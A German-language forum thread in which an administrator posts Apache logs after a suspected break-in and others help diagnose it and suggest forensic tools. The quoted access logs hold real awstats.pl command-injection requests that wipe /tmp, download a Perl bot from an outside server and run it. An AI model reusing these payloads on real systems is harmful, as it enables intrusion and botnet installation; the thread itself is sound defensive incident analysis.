Gestern ist mir aufgefallen, dass apache abgeschmiert war.
habe mir nichts weiter bei gedacht. Heute sehe ich die logs durch und siehe da,
was verdächtiges!

ich glaube ich bin gehackt worden!

Logs:
Apache errorlog:


[Sat Sep 17 23:17:37 2005] [error] [client 84.114.172.111] File does not exist: /htdocs
--03:04:35-- http://www.yogiplanet.com/linuxday.txt
=> `/tmp/.ayan'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... --03:04:45-- http://www.yogiplanet.com/linuxdaybot.txt
=> `/tmp/.ayan2'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,677 [text/plain]

0K .......... ........ 100% 53.03 KB/s

03:05:36 (53.03 KB/s) - `/tmp/.ayan2' saved [18677/18677]

failed: Connection timed out.
Retrying.

--03:07:45-- http://www.yogiplanet.com/linuxday.txt
(try: 2) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.

--03:10:56-- http://www.yogiplanet.com/linuxday.txt
(try: 3) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.

--03:14:08-- http://www.yogiplanet.com/linuxday.txt
(try: 4) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,154 [text/plain]

0K ... 100% 27.29 KB/s

03:14:12 (27.29 KB/s) - `/tmp/.ayan' saved [3154/3154]

[Sun Sep 18 04:02:02 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:03 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/cgi-bin
[Sun Sep 18 04:02:04 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:09 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:10 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats


Apache accesslog:

xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:02 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.1
38/Skins/de/viewde;perl%20icet;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:03 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/.it/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:04 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.5
3.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://8
0.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
ns1.wm-solingen.de 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.
220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:09 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:10 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http:
//80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


Kann einer genau sagen was dieses script macht?


MfG
Thomas

Server platt machen, neu aufsetzen.
Und diesmal ein anderes Board/Verwaltungsprogramm (eben das, das "awstats.pl" enthält) verwenden.
Wenn ich den Code richtig interpretiere, versucht er weitere phpBB-Boards anzugreifen. Die Lücke ist iirc schon seit ewigkeiten bekannt und gestopft; könnte es sein, dass du zu faul warst, dein phpBB zu aktualisieren?

http://www.nickles.de/static_cache/537940420.html

das ****** board ist aktuell ..

Powered by phpBB 2.0.17 © 2001 phpBB Group


komisch!

Hi!
Es wurde ja auch nicht über das Board sondern über awstats gehackt, siehe:

http://www.heise.de/newsticker/result.xhtml?url=/newsticker/meldung/62744

Ich benutze awstats nicht, meint Ihr das ist ein Hoffnungsschimmer?

Hi!
Auch wenn du es nicht benutzt war es drauf und der Cracker ist darüber auf dein System.

Hi!
Auch wenn du es nicht benutzt war es drauf und der Cracker ist darüber auf dein System.

Wo kannst du es sehen dass es drauf war?
Es kann nicht drauf gewesen sein, ich habe es nie installiert. Das meinte ich mit "nie benutzt". den Server habe ich von Grund auf installiert, ich weiß dass es nicht drauf war/ist...

Seine Aufrufversuche der awstats.pl schlugen fehl, 404.
So weit ich das sehen kann, wurde das Script runtergeladen (`/tmp/.ayan' saved).
Aber ob es auch ausgeführt wurde, kann ich noch nicht entdecken. Auch die Typischen files im /tmp Ordner, fehlen.....

mfg

Hi!
Hab die 404 übersehen. Hmm..dann prüfe mal die Log's nach der Angreifer IP. Dann siehst du schon, wie er eingestiegen ist. Sofern die Log's nicht bereinigt wurden, was sie wohl nicht sind.

Habe nur diese Einträge in den default Apache logs entdeckt.
Scheint alles zu sein ....




/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:02 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20icet;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:03 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:04 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:09 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/access.log.1:xxx 203.114.64.241 - - [18/Sep/2005:04:02:10 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:02 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:03 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/cgi-bin
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:04 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:09 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
/var/log/apache2/error.log.1:[Sun Sep 18 04:02:10 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats

Ich glaube dass die beiden Sachen, der awstats hack und dieses IRC script, nichts miteinander zu tun haben ....

Gibt es eine Möglichkeit, gelöschte Dateien wieder sichtbar zu machen.
Dann könte ich sehen, ob diese runtergeledenen Files wirklich gespeichert wurde n ....


MfG & Danke

Gibt es eine Möglichkeit, gelöschte Dateien wieder sichtbar zu machen.
Dann könte ich sehen, ob diese runtergeledenen Files wirklich gespeichert wurde n ....


Das Suchwort lautet "Digital Forensic". Ein nettes Tool wäre beispielsweise Autopsy.

mfg
cane

im der aktuellen "Server Magazin, Volume 2" von http://server-magazin.de/ steht ein guter Artikel über "Dem Hacker auf der Spur: Erfolgreiche Hacker-Analyse"!

Ist vielleicht für dich interessant..

Eine sehr gute Live-Cd die auf Digital Forensic spezialisiert ist habe ich erst kürzlich entdeckt:

Helix (http://www.e-fense.com/helix/)


mfg
cane